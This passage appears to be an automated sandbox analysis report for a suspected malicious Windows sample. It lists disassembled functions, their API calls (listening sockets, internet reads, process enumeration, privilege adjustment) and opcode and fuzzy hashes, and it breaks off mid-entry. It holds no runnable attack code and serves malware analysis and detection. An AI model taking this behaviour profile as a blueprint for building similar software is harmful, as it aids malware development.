                                                            • Opcode ID: e20e671f7b27e68142da11aa863ec6002e184ce3d8c1847013fd67c33b98a5c3
                                                            • Instruction ID: 7f05a491ad16e10153bbd83ea2ecd621d7c408344145ecf3709ec40ef0428c16
                                                            • Opcode Fuzzy Hash: e20e671f7b27e68142da11aa863ec6002e184ce3d8c1847013fd67c33b98a5c3
                                                            • Instruction Fuzzy Hash: 4B0147B1A54B096AE72C6378DC4ABBA7258FB00342F248171FE0ED20DBDAD0DC808199
                                                            Function 00886596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008865EF
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 008865FE
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 0088661A
                                                            • listen.WSOCK32(00000000,00000005), ref: 00886629
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00886643
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00886657
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                            • String ID:
                                                            • API String ID: 1279440585-0
                                                            • Opcode ID: 17377d9810c076d2cbccf23be6d4246e0cbdbdccd1bdf480cf330bc5590788d4
                                                            • Instruction ID: a12ee67f6087948ee38c8ff3f656c973b00e04d0289a298ba086ba667bc45e67
                                                            • Opcode Fuzzy Hash: 17377d9810c076d2cbccf23be6d4246e0cbdbdccd1bdf480cf330bc5590788d4
                                                            • Instruction Fuzzy Hash: CE21A230600214AFCB14FF68C845B6EB7A9FF44320F18816AE996E73D2EB70AD51CB51
                                                            Function 00825680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00830FF6: std::exception::exception.LIBCMT ref: 0083102C
                                                              • Part of subcall function 00830FF6: __CxxThrowException@8.LIBCMT ref: 00831041
                                                            • _memmove.LIBCMT ref: 0086062F
                                                            • _memmove.LIBCMT ref: 00860744
                                                            • _memmove.LIBCMT ref: 008607EB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1300846289-0
                                                            • Opcode ID: e8887262c2951a89add9744040b1366c4c0dd6a36964fa20682dea7fd9aa5d15
                                                            • Instruction ID: 67d08b85d38560873a3e72c9e5304edc12884a982530b12a1bde2081b9aa934d
                                                            • Opcode Fuzzy Hash: e8887262c2951a89add9744040b1366c4c0dd6a36964fa20682dea7fd9aa5d15
                                                            • Instruction Fuzzy Hash: C70281B0A00219DFDF04DF68E992AAE7BB5FF84300F158069E806DB295EB31D951CF95
                                                            Function 00811287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 008119FA
                                                            • GetSysColor.USER32(0000000F), ref: 00811A4E
                                                            • SetBkColor.GDI32(?,00000000), ref: 00811A61
                                                              • Part of subcall function 00811290: DefDlgProcW.USER32(?,00000020,?), ref: 008112D8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ColorProc$LongWindow
                                                            • String ID:
                                                            • API String ID: 3744519093-0
                                                            • Opcode ID: 4c81567cdfb0999f0056a28a27641603c787a1491cb3c1e87cd65fda54f305b4
                                                            • Instruction ID: f591863808c3ae3b04d78052ce179cc4cbc22b414bcbd8d96e046204fbd16d6d
                                                            • Opcode Fuzzy Hash: 4c81567cdfb0999f0056a28a27641603c787a1491cb3c1e87cd65fda54f305b4
                                                            • Instruction Fuzzy Hash: 72A18B7010656CBADE28AB2C5C8CDFF3E9DFF41759B18021AF702D6192DE25CD9192B2
                                                            Function 00886A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008880A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008880CB
                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00886AB1
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00886ADA
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00886B13
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00886B20
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00886B34
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 99427753-0
                                                            • Opcode ID: c6b78d57c5adaed45b3b19f1e85041db3b571bb5fa1e354958d255a83a2fe12a
                                                            • Instruction ID: 628d1b341f4374c9b894ef8439991007ddc171a3a6decc177568a7f3a1a258f2
                                                            • Opcode Fuzzy Hash: c6b78d57c5adaed45b3b19f1e85041db3b571bb5fa1e354958d255a83a2fe12a
                                                            • Instruction Fuzzy Hash: C741B775600214AFEB10BF68DC96FAE77A9FF04724F048059F95AEB3C2DA705D408792
                                                            Function 008955FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: 1f009b864e6da5bcbf0a55bbc683a93c0e9c2f0bc5b2d34cf3aa15b915f69d17
                                                            • Instruction ID: b29dbf631cce41ca3e6591045555fa6b7bd44b5d9bd68046bd3e65fc6b74cf8d
                                                            • Opcode Fuzzy Hash: 1f009b864e6da5bcbf0a55bbc683a93c0e9c2f0bc5b2d34cf3aa15b915f69d17
                                                            • Instruction Fuzzy Hash: 6911B231300A216FEB233F26DC54A6F7B9DFF64721B494029F946D7241DB709942CBA5
                                                            Function 0088C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00851D88,?), ref: 0088C312
                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0088C324
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                            • API String ID: 2574300362-1816364905
                                                            • Opcode ID: bdebdebf5b488dea983401e85680f19faf6ce60db0184af7160f8c29cf8c3bf1
                                                            • Instruction ID: d4d228125c8028f4fe34db2ccd31a7c285aed5f69b4852293df938c642a2080c
                                                            • Opcode Fuzzy Hash: bdebdebf5b488dea983401e85680f19faf6ce60db0184af7160f8c29cf8c3bf1
                                                            • Instruction Fuzzy Hash: D5E08C70200703CFDB246F25D804A4676E4FB08315F84C43AE996C2320E7B4D881CBA0
                                                            Function 00823190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __itow__swprintf
                                                            • String ID:
                                                            • API String ID: 674341424-0
                                                            • Opcode ID: 3cc6d69c31d8a6063ebce36f3278021165d47b114feab67e2071a220e032585b
                                                            • Instruction ID: 94a4b1abd80f4e06b72ccf16347c46b66fae7edd68b7d386893a587d7729ef1d
                                                            • Opcode Fuzzy Hash: 3cc6d69c31d8a6063ebce36f3278021165d47b114feab67e2071a220e032585b
                                                            • Instruction Fuzzy Hash: 33228A715083119FC724DF18D8A1BAAB7E5FF84704F10891DF99AD7291DB34EA88CB92
                                                            Function 0088F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0088F151
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0088F15F
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0088F21F
                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0088F22E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                            • String ID:
                                                            • API String ID: 2576544623-0
                                                            • Opcode ID: ea9d58b5cd64e2f891e2ad837801d1d0d4c28c77656ab39073a38dd51fde81a2
                                                            • Instruction ID: 7784cc544bde5d9cf6ce3c5cfeff702c215628df87ef7e6c1308e4b59a3c2655
                                                            • Opcode Fuzzy Hash: ea9d58b5cd64e2f891e2ad837801d1d0d4c28c77656ab39073a38dd51fde81a2
                                                            • Instruction Fuzzy Hash: 34514C715043119BD310EF28DC86EABBBE8FF94710F14482DF595D7292EB70A948CB92
                                                            Function 008740B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 008740D1
                                                            • _memset.LIBCMT ref: 008740F2
                                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00874144
                                                            • CloseHandle.KERNEL32(00000000), ref: 0087414D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                                            • String ID:
                                                            • API String ID: 1157408455-0
                                                            • Opcode ID: 4db54ad65c35a361bc9dd20080ea50fd6a594fe63b138aefc06a37b96b28d955
                                                            • Instruction ID: 4be72583060977039a81818cd0d92594b5df556d1ae569405e4c8fe1d52ade34
                                                            • Opcode Fuzzy Hash: 4db54ad65c35a361bc9dd20080ea50fd6a594fe63b138aefc06a37b96b28d955
                                                            • Instruction Fuzzy Hash: F011CD7590122C7AD7306BA59C4DFABBB7CFF45760F104196F908D7190D6744E80CBA4
                                                            Function 0086EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0086EB19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: ($|
                                                            • API String ID: 1659193697-1631851259
                                                            • Opcode ID: f267aa793e1396606da121e7a06d3ae80205701699df08465629b358d77e2fcd
                                                            • Instruction ID: 84002b2d2e9222031dad44d3fb0b9a5cd8ea7ef4a795ed086b6dc5155b4afea2
                                                            • Opcode Fuzzy Hash: f267aa793e1396606da121e7a06d3ae80205701699df08465629b358d77e2fcd
                                                            • Instruction Fuzzy Hash: 7C323775A00605DFC728CF19D481A6AB7F1FF48320B16C56EE99ADB3A2DB70E941CB40
                                                            Function 008825E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 008826D5
                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0088270C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: b2ebac382b08d83f83d68cd2760fc90ad87649cd63ebd4c7925aa843b1ec2b37
                                                            • Instruction ID: 1b71dac9e8bec6b54c65537f2ccb912aa82563855c0d8341e0f83b8967be24cb
                                                            • Opcode Fuzzy Hash: b2ebac382b08d83f83d68cd2760fc90ad87649cd63ebd4c7925aa843b1ec2b37
                                                            • Instruction Fuzzy Hash: 6141E471500209BFEB20FE99DC85EBBB7FCFB50728F10406AF601E6141EA71AE4197A4
                                                            Function 0087B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0087B5AE
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0087B608
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0087B655
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1682464887-0
                                                            • Opcode ID: 3fcfafa91a06df16dd79d81ee370b1357d77f57cdf41103fdd0483af1bb5c80a
                                                            • Instruction ID: d55bcd3f82a75dff3c75ae387d5a782ae03bfe3aaa310136f143cec2acace928
                                                            • Opcode Fuzzy Hash: 3fcfafa91a06df16dd79d81ee370b1357d77f57cdf41103fdd0483af1bb5c80a
                                                            • Instruction Fuzzy Hash: 89216035A00518EFCB00EFA9D880EEDBBB9FF49310F1480AAE945EB351DB319955CB51
                                                            Function 00868CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00830FF6: std::exception::exception.LIBCMT ref: 0083102C
                                                              • Part of subcall function 00830FF6: __CxxThrowException@8.LIBCMT ref: 00831041
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00868D0D
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00868D3A
                                                            • GetLastError.KERNEL32 ref: 00868D47
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1922334811-0
                                                            • Opcode ID: 928dad062fbc9ba5fd9e49af3bcc5a4a54fb5670cff724561feed097246ca9ec
                                                            • Instruction ID: 001875b3514a199d8cfa3cd27d284cf06a8ac5469a7bd918a06faad0a84767e0
                                                            • Opcode Fuzzy Hash: 928dad062fbc9ba5fd9e49af3bcc5a4a54fb5670cff724561feed097246ca9ec
                                                            • Instruction Fuzzy Hash: 541191B1414209AFE728EF58DC86D6BB7BCFB44710B25862EF55AD3241EF70AC408A60
                                                            Function 00874C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00874C2C
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00874C43
                                                            • FreeSid.ADVAPI32(?), ref: 00874C53
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 0db8949d4e3d1b2aa844b98f6b31ae75425dddeebb03e4eac47e0f1e7893b7a6
                                                            • Instruction ID: 1703c6627d7cd8cb702f5f6eca4c21bbb65445776173349f776554038b8fd86d
                                                            • Opcode Fuzzy Hash: 0db8949d4e3d1b2aa844b98f6b31ae75425dddeebb03e4eac47e0f1e7893b7a6
                                                            • Instruction Fuzzy Hash: CFF04975A1130CBFDF04DFF0DC89AAEBBBCFF08201F1044A9AA01E2182E7706A048B50
                                                            Function 0081E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bcd3234011a929d5b8becd134acde3270a1d06e26a11733b64d05627a897e1cf
                                                            • Instruction ID: 6c08e1e26741936d4f4fbc070b1e9d4c4fce360a771367483502d41c25e60cbf
                                                            • Opcode Fuzzy Hash: bcd3234011a929d5b8becd134acde3270a1d06e26a11733b64d05627a897e1cf
                                                            • Instruction Fuzzy Hash: 16228B74A0021ADFDB24DF58C490AEEB7B9FF48310F148569EC56EB341E734A985CB92
                                                            Function 0087C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0087C966
                                                            • FindClose.KERNEL32(00000000), ref: 0087C996
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: d23db8b2aff992c4ddf677a1f6c47e84d051022e12c3e77656499794229d57f1
                                                            • Instruction ID: 21a1fb251399cc168083f58b92a6373debb0b75d5f109b88d207db90ee48e5b3
                                                            • Opcode Fuzzy Hash: d23db8b2aff992c4ddf677a1f6c47e84d051022e12c3e77656499794229d57f1
                                                            • Instruction Fuzzy Hash: 8B1161726106149FD710EF29D855A6AFBE9FF84324F04851EF9AAD7291DB34AC04CB81
                                                            Function 0087A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0088977D,?,0089FB84,?), ref: 0087A302
